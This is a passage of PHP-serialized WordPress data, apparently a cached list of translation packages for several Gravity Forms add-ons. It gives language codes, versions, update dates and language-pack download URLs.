7:\"Italian\";s:11:\"native_name\";s:8:\"Italiano\";s:7:\"package\";s:103:\"https://packages.translationspress.com/rocketgenius/gravityformscampfire/gravityformscampfire-it_IT.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"it\";i:1;s:3:\"ita\";}}s:2:\"ja\";a:7:{s:8:\"language\";s:2:\"ja\";s:7:\"version\";s:5:\"1.2.2\";s:7:\"updated\";s:25:\"2023-03-14T17:44:01+00:00\";s:12:\"english_name\";s:8:\"Japanese\";s:11:\"native_name\";s:9:\"日本語\";s:7:\"package\";s:100:\"https://packages.translationspress.com/rocketgenius/gravityformscampfire/gravityformscampfire-ja.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"ja\";}}s:2:\"pl\";a:7:{s:8:\"language\";s:5:\"pl_PL\";s:7:\"version\";s:5:\"1.2.2\";s:7:\"updated\";s:25:\"2023-01-06T17:02:22+00:00\";s:12:\"english_name\";s:6:\"Polish\";s:11:\"native_name\";s:6:\"Polski\";s:7:\"package\";s:103:\"https://packages.translationspress.com/rocketgenius/gravityformscampfire/gravityformscampfire-pl_PL.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"pl\";i:1;s:3:\"pol\";}}s:5:\"pt-br\";a:7:{s:8:\"language\";s:5:\"pt_BR\";s:7:\"version\";s:5:\"1.2.2\";s:7:\"updated\";s:25:\"2019-12-10T11:43:55+00:00\";s:12:\"english_name\";s:19:\"Portuguese (Brazil)\";s:11:\"native_name\";s:20:\"Português do Brasil\";s:7:\"package\";s:103:\"https://packages.translationspress.com/rocketgenius/gravityformscampfire/gravityformscampfire-pt_BR.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"pt\";i:1;s:3:\"por\";}}s:2:\"pt\";a:7:{s:8:\"language\";s:5:\"pt_PT\";s:7:\"version\";s:5:\"1.2.2\";s:7:\"updated\";s:25:\"2019-12-10T11:43:58+00:00\";s:12:\"english_name\";s:21:\"Portuguese (Portugal)\";s:11:\"native_name\";s:10:\"Português\";s:7:\"package\";s:103:\"https://packages.translationspress.com/rocketgenius/gravityformscampfire/gravityformscampfire-pt_PT.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"pt\";}}s:2:\"ru\";a:7:{s:8:\"language\";s:5:\"ru_RU\";s:7:\"version\";s:5:\"1.2.2\";s:7:\"updated\";s:25:\"2019-12-10T11:44:01+00:00\";s:12:\"english_name\";s:7:\"Russian\";s:11:\"native_name\";s:14:\"Русский\";s:7:\"package\";s:103:\"https://packages.translationspress.com/rocketgenius/gravityformscampfire/gravityformscampfire-ru_RU.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"ru\";i:1;s:3:\"rus\";}}s:2:\"es\";a:7:{s:8:\"language\";s:5:\"es_ES\";s:7:\"version\";s:5:\"1.2.2\";s:7:\"updated\";s:25:\"2019-12-10T11:43:36+00:00\";s:12:\"english_name\";s:15:\"Spanish (Spain)\";s:11:\"native_name\";s:8:\"Español\";s:7:\"package\";s:103:\"https://packages.translationspress.com/rocketgenius/gravityformscampfire/gravityformscampfire-es_ES.zip\";s:3:\"iso\";a:3:{i:0;s:2:\"es\";i:1;s:3:\"spa\";i:2;s:3:\"spa\";}}s:2:\"sv\";a:7:{s:8:\"language\";s:5:\"sv_SE\";s:7:\"version\";s:5:\"1.2.2\";s:7:\"updated\";s:25:\"2023-01-06T17:02:33+00:00\";s:12:\"english_name\";s:7:\"Swedish\";s:11:\"native_name\";s:7:\"Svenska\";s:7:\"package\";s:103:\"https://packages.translationspress.com/rocketgenius/gravityformscampfire/gravityformscampfire-sv_SE.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"sv\";i:1;s:3:\"swe\";}}s:2:\"tr\";a:7:{s:8:\"language\";s:5:\"tr_TR\";s:7:\"version\";s:5:\"1.2.2\";s:7:\"updated\";s:25:\"2020-02-13T09:15:04+00:00\";s:12:\"english_name\";s:7:\"Turkish\";s:11:\"native_name\";s:8:\"Türkçe\";s:7:\"package\";s:103:\"https://packages.translationspress.com/rocketgenius/gravityformscampfire/gravityformscampfire-tr_TR.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"tr\";i:1;s:3:\"tur\";}}}}s:22:\"gravityformscapsulecrm\";a:1:{s:12:\"translations\";a:22:{s:2:\"ca\";a:7:{s:8:\"language\";s:2:\"ca\";s:7:\"version\";s:5:\"1.6.1\";s:7:\"updated\";s:25:\"2023-02-20T14:31:14+00:00\";s:12:\"english_name\";s:7:\"Catalan\";s:11:\"native_name\";s:7:\"Català\";s:7:\"package\";s:104:\"https://packages.translationspress.com/rocketgenius/gravityformscapsulecrm/gravityformscapsulecrm-ca.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"ca\";i:1;s:3:\"cat\";}}s:5:\"zh-cn\";a:7:{s:8:\"language\";s:5:\"zh_CN\";s:7:\"version\";s:5:\"1.6.1\";s:7:\"updated\";s:25:\"2023-01-06T17:03:54+00:00\";s:12:\"english_name\";s:15:\"Chinese (China)\";s:11:\"native_name\";s:12:\"简体中文\";s:7:\"package\";s:107:\"https://packages.translationspress.com/rocketgenius/gravityformscapsulecrm/gravityformscapsulecrm-zh_CN.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"zh\";i:1;s:3:\"zho\";}}s:2:\"da\";a:7:{s:8:\"language\";s:5:\"da_DK\";s:7:\"version\";s:5:\"1.6.1\";s:7:\"updated\";s:25:\"2023-01-06T17:02:49+00:00\";s:12:\"english_name\";s:6:\"Danish\";s:11:\"native_name\";s:5:\"Dansk\";s:7:\"package\";s:107:\"https://packages.translationspress.com/rocketgenius/gravityformscapsulecrm/gravityformscapsulecrm-da_DK.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"da\";i:1;s:3:\"dan\";}}s:2:\"nl\";a:7:{s:8:\"language\";s:5:\"nl_NL\";s:7:\"version\";s:5:\"1.6.1\";s:7:\"updated\";s:25:\"2023-01-06T17:03:32+00:00\";s:12:\"english_name\";s:5:\"Dutch\";s:11:\"native_name\";s:10:\"Nederlands\";s:7:\"package\";s:107:\"https://packages.translationspress.com/rocketgenius/gravityformscapsulecrm/gravityformscapsulecrm-nl_NL.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"nl\";i:1;s:3:\"nld\";}}s:5:\"nl-be\";a:7:{s:8:\"language\";s:5:\"nl_BE\";s:7:\"version\";s:5:\"1.6.1\";s:7:\"updated\";s:25:\"2022-06-29T15:47:04+00:00\";s:12:\"english_name\";s:15:\"Dutch (Belgium)\";s:11:\"native_name\";s:20:\"Nederlands (België)\";s:7:\"package\";s:107:\"https://packages.translationspress.com/rocketgenius/gravityformscapsulecrm/gravityformscapsulecrm-nl_BE.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"nl\";i:1;s:3:\"nld\";}}s:5:\"en-au\";a:7:{s:8:\"language\";s:5:\"en_AU\";s:7:\"version\";s:5:\"1.6.1\";s:7:\"updated\";s:25:\"2022-06-27T08:52:42+00:00\";s:12:\"english_name\";s:19:\"English (Australia)\";s:11:\"native_name\";s:19:\"English (Australia)\";s:7:\"package\";s:107:\"https://packages.translationspress.com/rocketgenius/gravityformscapsulecrm/gravityformscapsulecrm-en_AU.zip\";s:3:\"iso\";a:3:{i:0;s:2:\"en\";i:1;s:3:\"eng\";i:2;s:3:\"eng\";}}s:5:\"en-gb\";a:7:{s:8:\"language\";s:5:\"en_GB\";s:7:\"version\";s:5:\"1.6.1\";s:7:\"updated\";s:25:\"2022-06-27T08:52:44+00:00\";s:12:\"english_name\";s:12:\"English (UK)\";s:11:\"native_name\";s:12:\"English (UK)\";s:7:\"package\";s:107:\"https://packages.translationspress.com/rocketgenius/gravityformscapsulecrm/gravityformscapsulecrm-en_GB.zip\";s:3:\"iso\";a:3:{i:0;s:2:\"en\";i:1;s:3:\"eng\";i:2;s:3:\"eng\";}}s:2:\"fi\";a:7:{s:8:\"language\";s:2:\"fi\";s:7:\"version\";s:5:\"1.6.1\";s:7:\"updated\";s:25:\"2023-01-06T17:03:07+00:00\";s:12:\"english_name\";s:7:\"Finnish\";s:11:\"native_name\";s:5:\"Suomi\";s:7:\"package\";s:104:\"https://packages.translationspress.com/rocketgenius/gravityformscapsulecrm/gravityformscapsulecrm-fi.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"fi\";i:1;s:3:\"fin\";}}s:2:\"fr\";a:7:{s:8:\"language\";s:5:\"fr_FR\";s:7:\"version\";s:5:\"1.6.1\";s:7:\"updated\";s:25:\"2021-05-25T20:59:21+00:00\";s:12:\"english_name\";s:15:\"French (France)\";s:11:\"native_name\";s:9:\"Français\";s:7:\"package\";s:107:\"https://packages.translationspress.com/rocketgenius/gravityformscapsulecrm/gravityformscapsulecrm-fr_FR.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"fr\";}}s:2:\"de\";a:7:{s:8:\"language\";s:5:\"de_DE\";s:7:\"version\";s:5:\"1.6.1\";s:7:\"updated\";s:25:\"2023-01-06T17:02:54+00:00\";s:12:\"english_name\";s:6:\"German\";s:11:\"native_name\";s:7:\"Deutsch\";s:7:\"package\";s:107:\"https://packages.translationspress.com/rocketgenius/gravityformscapsulecrm/gravityformscapsulecrm-de_DE.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"de\";}}s:2:\"he\";a:7:{s:8:\"language\";s:5:\"he_IL\";s:7:\"version\";s:5:\"1.6.1\";s:7:\"updated\";s:25:\"2023-01-06T17:03:14+00:00\";s:12:\"english_name\";s:6:\"Hebrew\";s:11:\"native_name\";s:16:\"עִבְרִית\";s:7:\"package\";s:107:\"https://packages.translationspress.com/rocketgenius/gravityformscapsulecrm/gravityformscapsulecrm-he_IL.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"he\";}}s:2:\"hi\";a:7:{s:8:\"language\";s:5:\"hi_IN\";s:7:\"version\";s:5:\"1.6.1\";s:7:\"updated\";s:25:\"2023-01-06T17:03:16+00:00\";s:12:\"english_name\";s:5:\"Hindi\";s:11:\"native_name\";s:18:\"हिन्दी\";s:7:\"package\";s:107:\"https://packages.translationspress.com/rocketgenius/gravityformscapsulecrm/gravityformscapsulecrm-hi_IN.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"hi\";i:1;s:3:\"hin\";}}s:2:\"it\";a:7:{s:8:\"language\";s:5:\"it_IT\";s:7:\"version\";s:5:\"1.6.1\";s:7:\"updated\";s:25:\"2023-01-06T17:03:21+00:00\";s:12:\"english_name\";s:7:\"Italian\";s:11:\"native_name\";s:8:\"Italiano\";s:7:\"package\";s:107:\"https://packages.translationspress.com/rocketgenius/gravityformscapsulecrm/gravityformscapsulecrm-it_IT.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"it\";i:1;s:3:\"ita\";}}s:2:\"ja\";a:7:{s:8:\"language\";s:2:\"ja\";s:7:\"version\";s:5:\"1.6.1\";s:7:\"updated\";s:25:\"2023-03-14T17:44:51+00:00\";s:12:\"english_name\";s:8:\"Japanese\";s:11:\"native_name\";s:9:\"日本語\";s:7:\"package\";s:104:\"https://packages.translationspress.com/rocketgenius/gravityformscapsulecrm/gravityformscapsulecrm-ja.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"ja\";}}s:2:\"pl\";a:7:{s:8:\"language\";s:5:\"pl_PL\";s:7:\"version\";s:5:\"1.6.1\";s:7:\"updated\";s:25:\"2023-01-06T17:03:34+00:00\";s:12:\"english_name\";s:6:\"Polish\";s:11:\"native_name\";s:6:\"Polski\";s:7:\"package\";s:107:\"https://packages.translationspress.com/rocketgenius/gravityformscapsulecrm/gravityformscapsulecrm-pl_PL.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"pl\";i:1;s:3:\"pol\";}}s:5:\"pt-br\";a:7:{s:8:\"language\";s:5:\"pt_BR\";s:7:\"version\";s:5:\"1.6.1\";s:7:\"updated\";s:25:\"2023-01-06T17:03:37+00:00\";s:12:\"english_name\";s:19:\"Portuguese (Brazil)\";s:11:\"native_name\";s:20:\"Português do Brasil\";s:7:\"package\";s:107:\"https://packages.translationspress.com/rocketgenius/gravityformscapsulecrm/gravityformscapsulecrm-pt_BR.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"pt\";i:1;s:3:\"por\";}}s:2:\"pt\";a:7:{s:8:\"language\";s:5:\"pt_PT\";s:7:\"version\";s:5:\"1.6.1\";s:7:\"updated\";s:25:\"2021-05-24T10:24:48+00:00\";s:12:\"english_name\";s:21:\"Portuguese (Portugal)\";s:11:\"native_name\";s:10:\"Português\";s:7:\"package\";s:107:\"https://packages.translationspress.com/rocketgenius/gravityformscapsulecrm/gravityformscapsulecrm-pt_PT.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"pt\";}}s:2:\"ru\";a:7:{s:8:\"language\";s:5:\"ru_RU\";s:7:\"version\";s:5:\"1.6.1\";s:7:\"updated\";s:25:\"2023-01-06T17:03:42+00:00\";s:12:\"english_name\";s:7:\"Russian\";s:11:\"native_name\";s:14:\"Русский\";s:7:\"package\";s:107:\"https://packages.translationspress.com/rocketgenius/gravityformscapsulecrm/gravityformscapsulecrm-ru_RU.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"ru\";i:1;s:3:\"rus\";}}s:2:\"es\";a:7:{s:8:\"language\";s:5:\"es_ES\";s:7:\"version\";s:5:\"1.6.1\";s:7:\"updated\";s:25:\"2023-01-06T17:03:03+00:00\";s:12:\"english_name\";s:15:\"Spanish (Spain)\";s:11:\"native_name\";s:8:\"Español\";s:7:\"package\";s:107:\"https://packages.translationspress.com/rocketgenius/gravityformscapsulecrm/gravityformscapsulecrm-es_ES.zip\";s:3:\"iso\";a:3:{i:0;s:2:\"es\";i:1;s:3:\"spa\";i:2;s:3:\"spa\";}}s:2:\"sv\";a:7:{s:8:\"language\";s:5:\"sv_SE\";s:7:\"version\";s:5:\"1.6.1\";s:7:\"updated\";s:25:\"2021-06-05T06:33:09+00:00\";s:12:\"english_name\";s:7:\"Swedish\";s:11:\"native_name\";s:7:\"Svenska\";s:7:\"package\";s:107:\"https://packages.translationspress.com/rocketgenius/gravityformscapsulecrm/gravityformscapsulecrm-sv_SE.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"sv\";i:1;s:3:\"swe\";}}s:2:\"tr\";a:7:{s:8:\"language\";s:5:\"tr_TR\";s:7:\"version\";s:5:\"1.6.1\";s:7:\"updated\";s:25:\"2023-01-06T17:03:49+00:00\";s:12:\"english_name\";s:7:\"Turkish\";s:11:\"native_name\";s:8:\"Türkçe\";s:7:\"package\";s:107:\"https://packages.translationspress.com/rocketgenius/gravityformscapsulecrm/gravityformscapsulecrm-tr_TR.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"tr\";i:1;s:3:\"tur\";}}s:2:\"uk\";a:7:{s:8:\"language\";s:2:\"uk\";s:7:\"version\";s:5:\"1.6.1\";s:7:\"updated\";s:25:\"2023-01-06T17:03:51+00:00\";s:12:\"english_name\";s:9:\"Ukrainian\";s:11:\"native_name\";s:20:\"Українська\";s:7:\"package\";s:104:\"https://packages.translationspress.com/rocketgenius/gravityformscapsulecrm/gravityformscapsulecrm-uk.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"uk\";i:1;s:3:\"ukr\";}}}}s:26:\"gravityformschainedselects\";a:1:{s:12:\"translations\";a:20:{s:2:\"bg\";a:7:{s:8:\"language\";s:5:\"bg_BG\";s:7:\"version\";s:3:\"1.6\";s:7:\"updated\";s:25:\"2023-04-14T18:06:58+00:00\";s:12:\"english_name\";s:9:\"Bulgarian\";s:11:\"native_name\";s:18:\"Български\";s:7:\"package\";s:115:\"https://packages.translationspress.com/rocketgenius/gravityformschainedselects/gravityformschainedselects-bg_BG.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"bg\";i:1;s:3:\"bul\";}}s:2:\"ca\";a:7:{s:8:\"language\";s:2:\"ca\";s:7:\"version\";s:3:\"1.6\";s:7:\"updated\";s:25:\"2022-06-23T19:13:15+00:00\";s:12:\"english_name\";s:7:\"Catalan\";s:11:\"native_name\";s:7:\"Català\";s:7:\"package\";s:112:\"https://packages.translationspress.com/rocketgenius/gravityformschainedselects/gravityformschainedselects-ca.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"ca\";i:1;s:3:\"cat\";}}s:2:\"da\";a:7:{s:8:\"language\";s:5:\"da_DK\";s:7:\"version\";s:3:\"1.6\";s:7:\"updated\";s:25:\"2022-06-23T19:13:22+00:00\";s:12:\"english_name\";s:6:\"Danish\";s:11:\"native_name\";s:5:\"Dansk\";s:7:\"package\";s:115:\"https://packages.translationspress.com/rocketgenius/gravityformschainedselects/gravityformschainedselects-da_DK.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"da\";i:1;s:3:\"dan\";}}s:2:\"nl\";a:7:{s:8:\"language\";s:5:\"nl_NL\";s:7:\"version\";s:3:\"1.6\";s:7:\"updated\";s:25:\"2023-01-06T17:04:41+00:00\";s:12:\"english_name\";s:5:\"Dutch\";s:11:\"native_name\";s:10:\"Nederlands\";s:7:\"package\";s:115:\"https://packages.translationspress.com/rocketgenius/gravityformschainedselects/gravityformschainedselects-nl_NL.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"nl\";i:1;s:3:\"nld\";}}s:5:\"en-au\";a:7:{s:8:\"language\";s:5:\"en_AU\";s:7:\"version\";s:3:\"1.6\";s:7:\"updated\";s:25:\"2022-06-27T08:34:12+00:00\";s:12:\"english_name\";s:19:\"English (Australia)\";s:11:\"native_name\";s:19:\"English (Australia)\";s:7:\"package\";s:115:\"https://packages.translationspress.com/rocketgenius/gravityformschainedselects/gravityformschainedselects-en_AU.zip\";s:3:\"iso\";a:3:{i:0;s:2:\"en\";i:1;s:3:\"eng\";i:2;s:3:\"eng\";}}s:5:\"en-gb\";a:7:{s:8:\"language\";s:5:\"en_GB\";s:7:\"version\";s:3:\"1.6\";s:7:\"updated\";s:25:\"2022-03-15T13:30:44+00:00\";s:12:\"english_name\";s:12:\"English (UK)\";s:11:\"native_name\";s:12:\"English (UK)\";s:7:\"package\";s:115:\"https://packages.translationspress.com/rocketgenius/gravityformschainedselects/gravityformschainedselects-en_GB.zip\";s:3:\"iso\";a:3:{i:0;s:2:\"en\";i:1;s:3:\"eng\";i:2;s:3:\"eng\";}}s:2:\"fi\";a:7:{s:8:\"language\";s:2:\"fi\";s:7:\"version\";s:3:\"1.6\";s:7:\"updated\";s:25:\"2022-06-23T19:13:43+00:00\";s:12:\"english_name\";s:7:\"Finnish\";s:11:\"native_name\";s:5:\"Suomi\";s:7:\"package\";s:112:\"https://packages.translationspress.com/rocketgenius/gravityformschainedselects/gravityformschainedselects-fi.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"fi\";i:1;s:3:\"fin\";}}s:2:\"fr\";a:7:{s:8:\"language\";s:5:\"fr_FR\";s:7:\"version\";s:3:\"1.6\";s:7:\"updated\";s:25:\"2020-10-27T15:57:33+00:00\";s:12:\"english_name\";s:15:\"French (France)\";s:11:\"native_name\";s:9:\"Français\";s:7:\"package\";s:115:\"https://packages.translationspress.com/rocketgenius/gravityformschainedselects/gravityformschainedselects-fr_FR.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"fr\";}}s:2:\"de\";a:7:{s:8:\"language\";s:5:\"de_DE\";s:7:\"version\";s:3:\"1.6\";s:7:\"updated\";s:25:\"2020-11-04T16:39:59+00:00\";s:12:\"english_name\";s:6:\"German\";s:11:\"native_name\";s:7:\"Deutsch\";s:7:\"package\";s:115:\"https://packages.translationspress.com/rocketgenius/gravityformschainedselects/gravityformschainedselects-de_DE.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"de\";}}s:2:\"he\";a:7:{s:8:\"language\";s:5:\"he_IL\";s:7:\"version\";s:3:\"1.6\";s:7:\"updated\";s:25:\"2020-11-04T16:39:05+00:00\";s:12:\"english_name\";s:6:\"Hebrew\";s:11:\"native_name\";s:16:\"עִבְרִית\";s:7:\"package\";s:115:\"https://packages.translationspress.com/rocketgenius/gravityformschainedselects/gravityformschainedselects-he_IL.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"he\";}}s:2:\"hi\";a:7:{s:8:\"language\";s:5:\"hi_IN\";s:7:\"version\";s:3:\"1.6\";s:7:\"updated\";s:25:\"2020-10-27T15:56:33+00:00\";s:12:\"english_name\";s:5:\"Hindi\";s:11:\"native_name\";s:18:\"हिन्दी\";s:7:\"package\";s:115:\"https://packages.translationspress.com/rocketgenius/gravityformschainedselects/gravityformschainedselects-hi_IN.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"hi\";i:1;s:3:\"hin\";}}s:2:\"it\";a:7:{s:8:\"language\";s:5:\"it_IT\";s:7:\"version\";s:3:\"1.6\";s:7:\"updated\";s:25:\"2020-11-04T16:40:25+00:00\";s:12:\"english_name\";s:7:\"Italian\";s:11:\"native_name\";s:8:\"Italiano\";s:7:\"package\";s:115:\"https://packages.translationspress.com/rocketgenius/gravityformschainedselects/gravityformschainedselects-it_IT.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"it\";i:1;s:3:\"ita\";}}s:2:\"ja\";a:7:{s:8:\"language\";s:2:\"ja\";s:7:\"version\";s:3:\"1.6\";s:7:\"updated\";s:25:\"2020-12-17T14:50:04+00:00\";s:12:\"english_name\";s:8:\"Japanese\";s:11:\"native_name\";s:9:\"日本語\";s:7:\"package\";s:112:\"https://packages.translationspress.com/rocketgenius/gravityformschainedselects/gravityformschainedselects-ja.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"ja\";}}s:2:\"pl\";a:7:{s:8:\"language\";s:5:\"pl_PL\";s:7:\"version\";s:3:\"1.6\";s:7:\"updated\";s:25:\"2021-09-13T21:00:54+00:00\";s:12:\"english_name\";s:6:\"Polish\";s:11:\"native_name\";s:6:\"Polski\";s:7:\"package\";s:115:\"https://packages.translationspress.com/rocketgenius/gravityformschainedselects/gravityformschainedselects-pl_PL.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"pl\";i:1;s:3:\"pol\";}}s:5:\"pt-br\";a:7:{s:8:\"language\";s:5:\"pt_BR\";s:7:\"version\";s:3:\"1.6\";s:7:\"updated\";s:25:\"2020-12-17T15:03:03+00:00\";s:12:\"english_name\";s:19:\"Portuguese (Brazil)\";s:11:\"native_name\";s:20:\"Português do Brasil\";s:7:\"package\";s:115:\"https://packages.translationspress.com/rocketgenius/gravityformschainedselects/gravityformschainedselects-pt_BR.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"pt\";i:1;s:3:\"por\";}}s:2:\"pt\";a:7:{s:8:\"language\";s:5:\"pt_PT\";s:7:\"version\";s:3:\"1.6\";s:7:\"updated\";s:25:\"2020-12-17T15:55:04+00:00\";s:12:\"english_name\";s:21:\"Portuguese (Portugal)\";s:11:\"native_name\";s:10:\"Português\";s:7:\"package\";s:115:\"https://packages.translationspress.com/rocketgenius/gravityformschainedselects/gravityformschainedselects-pt_PT.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"pt\";}}s:2:\"ru\";a:7:{s:8:\"language\";s:5:\"ru_RU\";s:7:\"version\";s:3:\"1.6\";s:7:\"updated\";s:25:\"2020-11-04T16:40:51+00:00\";s:12:\"english_name\";s:7:\"Russian\";s:11:\"native_name\";s:14:\"Русский\";s:7:\"package\";s:115:\"https://packages.translationspress.com/rocketgenius/gravityformschainedselects/gravityformschainedselects-ru_RU.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"ru\";i:1;s:3:\"rus\";}}s:2:\"es\";a:7:{s:8:\"language\";s:5:\"es_ES\";s:7:\"version\";s:3:\"1.6\";s:7:\"updated\";s:25:\"2023-01-06T17:04:14+00:00\";s:12:\"english_name\";s:15:\"Spanish (Spain)\";s:11:\"native_name\";s:8:\"Español\";s:7:\"package\";s:115:\"https://packages.translationspress.com/rocketgenius/gravityformschainedselects/gravityformschainedselects-es_ES.zip\";s:3:\"iso\";a:3:{i:0;s:2:\"es\";i:1;s:3:\"spa\";i:2;s:3:\"spa\";}}s:2:\"sv\";a:7:{s:8:\"language\";s:5:\"sv_SE\";s:7:\"version\";s:3:\"1.6\";s:7:\"updated\";s:25:\"2020-10-21T17:43:40+00:00\";s:12:\"english_name\";s:7:\"Swedish\";s:11:\"native_name\";s:7:\"Svenska\";s:7:\"package\";s:115:\"https://packages.translationspress.com/rocketgenius/gravityformschainedselects/gravityformschainedselects-sv_SE.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"sv\";i:1;s:3:\"swe\";}}s:2:\"tr\";a:7:{s:8:\"language\";s:5:\"tr_TR\";s:7:\"version\";s:3:\"1.6\";s:7:\"updated\";s:25:\"2020-10-27T15:55:51+00:00\";s:12:\"english_name\";s:7:\"Turkish\";s:11:\"native_name\";s:8:\"Türkçe\";s:7:\"package\";s:115:\"https://packages.translationspress.com/rocketgenius/gravityformschainedselects/gravityformschainedselects-tr_TR.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"tr\";i:1;s:3:\"tur\";}}}}s:23:\"gravityformscleverreach\";a:1:{s:12:\"translations\";a:20:{s:2:\"ca\";a:7:{s:8:\"language\";s:2:\"ca\";s:7:\"version\";s:5:\"1.7.1\";s:7:\"updated\";s:25:\"2023-02-20T14:31:14+00:00\";s:12:\"english_name\";s:7:\"Catalan\";s:11:\"native_name\";s:7:\"Català\";s:7:\"package\";s:106:\"https://packages.translationspress.com/rocketgenius/gravityformscleverreach/gravityformscleverreach-ca.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"ca\";i:1;s:3:\"cat\";}}s:2:\"da\";a:7:{s:8:\"language\";s:5:\"da_DK\";s:7:\"version\";s:5:\"1.7.1\";s:7:\"updated\";s:25:\"2023-01-06T17:05:10+00:00\";s:12:\"english_name\";s:6:\"Danish\";s:11:\"native_name\";s:5:\"Dansk\";s:7:\"package\";s:109:\"https://packages.translationspress.com/rocketgenius/gravityformscleverreach/gravityformscleverreach-da_DK.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"da\";i:1;s:3:\"dan\";}}s:2:\"nl\";a:7:{s:8:\"language\";s:5:\"nl_NL\";s:7:\"version\";s:5:\"1.7.1\";s:7:\"updated\";s:25:\"2020-10-27T16:14:47+00:00\";s:12:\"english_name\";s:5:\"Dutch\";s:11:\"native_name\";s:10:\"Nederlands\";s:7:\"package\";s:109:\"https://packages.translationspress.com/rocketgenius/gravityformscleverreach/gravityformscleverreach-nl_NL.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"nl\";i:1;s:3:\"nld\";}}s:5:\"en-au\";a:7:{s:8:\"language\";s:5:\"en_AU\";s:7:\"version\";s:5:\"1.7.1\";s:7:\"updated\";s:25:\"2022-06-27T08:54:38+00:00\";s:12:\"english_name\";s:19:\"English (Australia)\";s:11:\"native_name\";s:19:\"English (Australia)\";s:7:\"package\";s:109:\"https://packages.translationspress.com/rocketgenius/gravityformscleverreach/gravityformscleverreach-en_AU.zip\";s:3:\"iso\";a:3:{i:0;s:2:\"en\";i:1;s:3:\"eng\";i:2;s:3:\"eng\";}}s:5:\"en-gb\";a:7:{s:8:\"language\";s:5:\"en_GB\";s:7:\"version\";s:5:\"1.7.1\";s:7:\"updated\";s:25:\"2022-06-27T08:54:39+00:00\";s:12:\"english_name\";s:12:\"English (UK)\";s:11:\"native_name\";s:12:\"English (UK)\";s:7:\"package\";s:109:\"https://packages.translationspress.com/rocketgenius/gravityformscleverreach/gravityformscleverreach-en_GB.zip\";s:3:\"iso\";a:3:{i:0;s:2:\"en\";i:1;s:3:\"eng\";i:2;s:3:\"eng\";}}s:2:\"fi\";a:7:{s:8:\"language\";s:2:\"fi\";s:7:\"version\";s:5:\"1.7.1\";s:7:\"updated\";s:25:\"2023-01-06T17:05:28+00:00\";s:12:\"english_name\";s:7:\"Finnish\";s:11:\"native_name\";s:5:\"Suomi\";s:7:\"package\";s:106:\"https://packages.translationspress.com/rocketgenius/gravityformscleverreach/gravityformscleverreach-fi.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"fi\";i:1;s:3:\"fin\";}}s:2:\"fr\";a:7:{s:8:\"language\";s:5:\"fr_FR\";s:7:\"version\";s:5:\"1.7.1\";s:7:\"updated\";s:25:\"2023-01-06T17:05:32+00:00\";s:12:\"english_name\";s:15:\"French (France)\";s:11:\"native_name\";s:9:\"Français\";s:7:\"package\";s:109:\"https://packages.translationspress.com/rocketgenius/gravityformscleverreach/gravityformscleverreach-fr_FR.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"fr\";}}s:2:\"de\";a:7:{s:8:\"language\";s:5:\"de_DE\";s:7:\"version\";s:5:\"1.7.1\";s:7:\"updated\";s:25:\"2023-01-06T17:05:14+00:00\";s:12:\"english_name\";s:6:\"German\";s:11:\"native_name\";s:7:\"Deutsch\";s:7:\"package\";s:109:\"https://packages.translationspress.com/rocketgenius/gravityformscleverreach/gravityformscleverreach-de_DE.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"de\";}}s:2:\"he\";a:7:{s:8:\"language\";s:5:\"he_IL\";s:7:\"version\";s:5:\"1.7.1\";s:7:\"updated\";s:25:\"2023-01-06T17:05:34+00:00\";s:12:\"english_name\";s:6:\"Hebrew\";s:11:\"native_name\";s:16:\"עִבְרִית\";s:7:\"package\";s:109:\"https://packages.translationspress.com/rocketgenius/gravityformscleverreach/gravityformscleverreach-he_IL.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"he\";}}s:2:\"hi\";a:7:{s:8:\"language\";s:5:\"hi_IN\";s:7:\"version\";s:5:\"1.7.1\";s:7:\"updated\";s:25:\"2023-01-06T17:05:36+00:00\";s:12:\"english_name\";s:5:\"Hindi\";s:11:\"native_name\";s:18:\"हिन्दी\";s:7:\"package\";s:109:\"https://packages.translationspress.com/rocketgenius/gravityformscleverreach/gravityformscleverreach-hi_IN.zip\";s:3:\